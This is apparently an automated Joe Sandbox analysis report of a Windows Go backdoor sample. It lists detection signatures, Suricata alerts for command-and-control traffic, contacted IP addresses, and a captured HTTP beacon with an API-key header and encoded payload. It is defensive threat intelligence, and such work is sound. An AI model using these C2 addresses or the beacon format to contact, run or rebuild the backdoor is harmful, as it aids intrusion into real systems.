Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Week11.exe.bin.exe

Overview

General Information

Sample name:Week11.exe.bin.exe
Analysis ID:1553244
MD5:4fbc4f26e90324c3b535943452460761
SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
Tags:exeuser-JaffaCakes118
Infos:

Detection

GO Backdoor
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to infect the boot sector
Found Tor onion address
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Week11.exe.bin.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\Week11.exe.bin.exe" MD5: 4FBC4F26E90324C3B535943452460761)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Week11.exe.bin.exe PID: 7116JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-10T16:48:27.568206+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749740TCP
    2024-11-10T16:49:06.205644+010020229301A Network Trojan was detected52.149.20.212443192.168.2.749966TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-10T16:48:51.808327+010028555361A Network Trojan was detected192.168.2.749893185.157.213.25312072TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-10T16:49:21.106238+010028555371A Network Trojan was detected192.168.2.749893185.157.213.25312072TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-10T16:49:21.344322+010028555381A Network Trojan was detected185.157.213.25312072192.168.2.749893TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-10T16:48:51.808061+010028555391A Network Trojan was detected185.157.213.25312072192.168.2.749893TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: Week11.exe.bin.exeReversingLabs: Detection: 36%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.0% probability
    Source: Week11.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Week11.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: Week11.exe.bin.exe
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046C990 FindFirstFileW,1_2_0046C990
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046D300 _memset,FindFirstFileW,FindNextFileW,FindNextFileW,1_2_0046D300
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004479B0 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,PathIsDirectoryW,_memset,FindFirstFileW,InterlockedCompareExchange,Sleep,Sleep,FindNextFileW,FindClose,WaitForSingleObject,WaitForSingleObject,InterlockedCompareExchange,_memset,Sleep,Sleep,_memset,PathFileExistsW,1_2_004479B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00449B60 FindFirstFileW,1_2_00449B60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0046DE90 GetLogicalDriveStringsW,GetLogicalDriveStringsW,_memset,GetLogicalDriveStringsW,_wcsnlen,_wcsnlen,1_2_0046DE90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 4x nop then shr ecx, 0Dh1_2_031C84C0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 4x nop then mov dword ptr [esp], edx1_2_031BD130
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 4x nop then shr ebp, 0Dh1_2_031C7A50

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.157.213.253:12072 -> 192.168.2.7:49893
    Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.7:49893 -> 185.157.213.253:12072
    Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.7:49893 -> 185.157.213.253:12072
    Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.157.213.253:12072 -> 192.168.2.7:49893
    Found Tor onion address
    Source: Week11.exe.bin.exe, 00000001.00000002.2482404287.0000000002A60000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: Week11.exe.bin.exe, 00000001.00000002.2483016683.00000000031A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: global trafficTCP traffic: 192.168.2.7:49893 -> 185.157.213.253:12072
    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
    Source: Joe Sandbox ViewIP Address: 188.130.206.243 188.130.206.243
    Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
    Source: Joe Sandbox ViewASN Name: TVHORADADAES TVHORADADAES
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49740
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49966
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00454F30 DeleteUrlCacheEntryW,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetOpenUrlW,InternetCloseHandle,HttpQueryInfoW,_memset,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00454F30
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 198X-Api-Key: imeRTf84Accept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F2000.00000004.00001000.00020000.00000000.sdmp, Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: Week11.exe.bin.exe, 00000001.00000002.2483895164.000000000C0F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
    Source: Week11.exe.bin.exeString found in binary or memory: http://s.360safe.com/safei18n/
    Source: Week11.exe.bin.exeString found in binary or memory: http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen
    Source: shared.xmlString found in binary or memory: https://store.360totalsecurity.com/
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004171D5 NtQueryDefaultLocale,1_2_004171D5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004158C8 StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004158C8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416050 NtQueryDefaultLocale,1_2_00416050
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041612B NtQueryDefaultLocale,1_2_0041612B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416246 NtQueryDefaultLocale,1_2_00416246
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004162E6 NtQueryDefaultLocale,1_2_004162E6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416468 NtQueryDefaultLocale,1_2_00416468
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004164E8 NtQueryDefaultLocale,1_2_004164E8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416481 NtQueryDefaultLocale,1_2_00416481
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041667D NtQueryDefaultLocale,1_2_0041667D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004166AE NtQueryDefaultLocale,1_2_004166AE
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416776 NtQueryDefaultLocale,1_2_00416776
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416817 NtQueryDefaultLocale,1_2_00416817
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004168F4 NtQueryDefaultLocale,1_2_004168F4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004169EC NtQueryDefaultLocale,1_2_004169EC
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416993 NtQueryDefaultLocale,1_2_00416993
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414A30 NtQueryDefaultLocale,1_2_00414A30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416CCA NtQueryDefaultLocale,1_2_00416CCA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416CA5 NtQueryDefaultLocale,1_2_00416CA5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416CB0 NtQueryDefaultLocale,1_2_00416CB0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416DDA NtQueryDefaultLocale,1_2_00416DDA
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416D8F NtQueryDefaultLocale,1_2_00416D8F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00414EC6 StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00414EC6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416E88 NtQueryDefaultLocale,1_2_00416E88
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00416FA1 NtQueryDefaultLocale,1_2_00416FA1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417022 NtQueryDefaultLocale,1_2_00417022
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041712E NtQueryDefaultLocale,1_2_0041712E
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417133 NtQueryDefaultLocale,1_2_00417133
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041718B NtQueryDefaultLocale,1_2_0041718B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153D1 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153D1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153FB NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153FB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153B1 StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153B1
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153B6 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153B6
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004153BD NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004153BD
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041741B NtQueryDefaultLocale,1_2_0041741B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415424 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415424
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00417430 NtQueryDefaultLocale,1_2_00417430
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156F5 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004156F5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415682 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415682
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041568F NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_0041568F
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004156A2 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_004156A2
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415787 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415787
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041595B StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_0041595B
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415962 StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415962
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_00415BF4 NtQueryDefaultLocale,NtQueryDefaultLocale,1_2_00415BF4
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031E0060 SetWaitableTimer,NtWaitForSingleObject,1_2_031E0060
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031FC7B0 NtWaitForSingleObject,1_2_031FC7B0
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6B90 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6B90
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6E00 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6E00
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6D30 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6D30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031CEC30 LoadLibraryExW,RtlAddVectoredContinueHandler,LoadLibraryExW,LoadLibraryExW,NtWaitForSingleObject,RtlGetCurrentPeb,RtlGetNtVersionNumbers,LoadLibraryExW,timeBeginPeriod,timeEndPeriod,timeBeginPeriod,LoadLibraryExW,WSAGetOverlappedResult,1_2_031CEC30
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_031D6C60 SetWaitableTimer,NtWaitForSingleObject,1_2_031D6C60
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004AB600: DeviceIoControl,1_2_004AB600
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041E8051_2_0041E805
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004171D51_2_004171D5
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004158C81_2_004158C8
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004160501_2_00416050
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_004100551_2_00410055
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C0041_2_0041C004
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C0261_2_0041C026
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041C0CB1_2_0041C0CB
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0040609D1_2_0040609D
    Source: C:\Users\user\Desktop\Week11.exe.bin.exeCode function: 1_2_0041612B1_2_0041612B
